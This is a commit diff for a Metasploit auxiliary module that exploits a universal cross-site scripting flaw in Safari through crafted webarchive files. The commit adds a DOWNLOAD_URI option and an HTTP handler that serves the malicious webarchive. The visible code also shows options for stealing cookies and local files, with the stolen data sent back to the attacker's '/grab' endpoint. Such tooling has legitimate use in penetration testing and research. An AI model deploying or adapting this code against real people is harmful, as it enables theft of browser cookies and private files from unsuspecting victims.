Skip to content

Commit 55e0ec3

Browse files
committed
Add support for DOWNLOAD_URI option.
* Fixes some comments that were no longer accurate. Conflicts: modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
1 parent 1d9a695 commit 55e0ec3

File tree

1 file changed

+28
-6
lines changed

1 file changed

+28
-6
lines changed

modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Lines changed: 28 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,7 @@ def initialize(info = {})
5050
OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']),
5151
OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/']),
5252
OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
53+
OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
5354
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
5455
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
5556
OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@@ -153,6 +154,20 @@ def start_http(opts={})
153154
@service_path = uopts['Path']
154155
@http_service.add_resource(uopts['Path'], uopts)
155156

157+
# Add path to download
158+
uopts = {
159+
'Proc' => Proc.new { |cli, req|
160+
resp = Rex::Proto::Http::Response::OK.new
161+
resp['Content-Type'] = 'application/x-webarchive'
162+
resp.body = @xml.to_s
163+
cli.send_response resp
164+
},
165+
'Path' => webarchive_download_url
166+
}.update(opts['Uri'] || {})
167+
@http_service.add_resource(webarchive_download_url, uopts)
168+
169+
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
170+
156171
# As long as we have the http_service object, we will keep the ftp server alive
157172
while @http_service
158173
select(nil, nil, nil, 1)
@@ -176,9 +191,10 @@ def on_request_uri(cli, request)
176191

177192
# @return [String] contents of webarchive as an XML document
178193
def webarchive_xml
179-
xml = webarchive_header
180-
urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
181-
xml << webarchive_footer
194+
return @xml if not @xml.nil? # only compute xml once
195+
@xml = webarchive_header
196+
urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
197+
@xml << webarchive_footer
182198
end
183199

184200
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +304,9 @@ def webarchive_footer
288304
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
289305
# [a encodeObject:response forKey:@"WebResourceResponse"];
290306
def web_response_xml(script)
291-
# this is a binary plist, but im too lazy to write a real encoder.
292-
# ripped this straight out of a safari webarchive save.
307+
# this is a serialized NSHTTPResponse, i'm too lazy to write a
308+
# real encoder so yay lets use string interpolation.
309+
# ripped this straight out of a webarchive save
293310
script['content-length'] = script[:body].length
294311
whitelist = %w(content-type content-length date etag
295312
Last-Modified cache-control expires)
@@ -711,7 +728,7 @@ def all_script_urls(pages)
711728
end
712729
end
713730

714-
# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
731+
# @return [Array<Array<Hash>>] list of headers returned by cacheabke remote javascripts
715732
def find_cached_scripts
716733
cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
717734
begin
@@ -780,6 +797,11 @@ def backend_url
780797
"#{proto}://#{myhost}#{port_str}"
781798
end
782799

800+
# @return [String] URL that serves the malicious webarchive
801+
def webarchive_download_url
802+
@webarchive_download_url ||= datastore["DOWNLOAD_URI"]
803+
end
804+
783805
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
784806
# via the FILE_URLS module option.
785807
def interesting_file_urls

0 commit comments

Comments
 (0)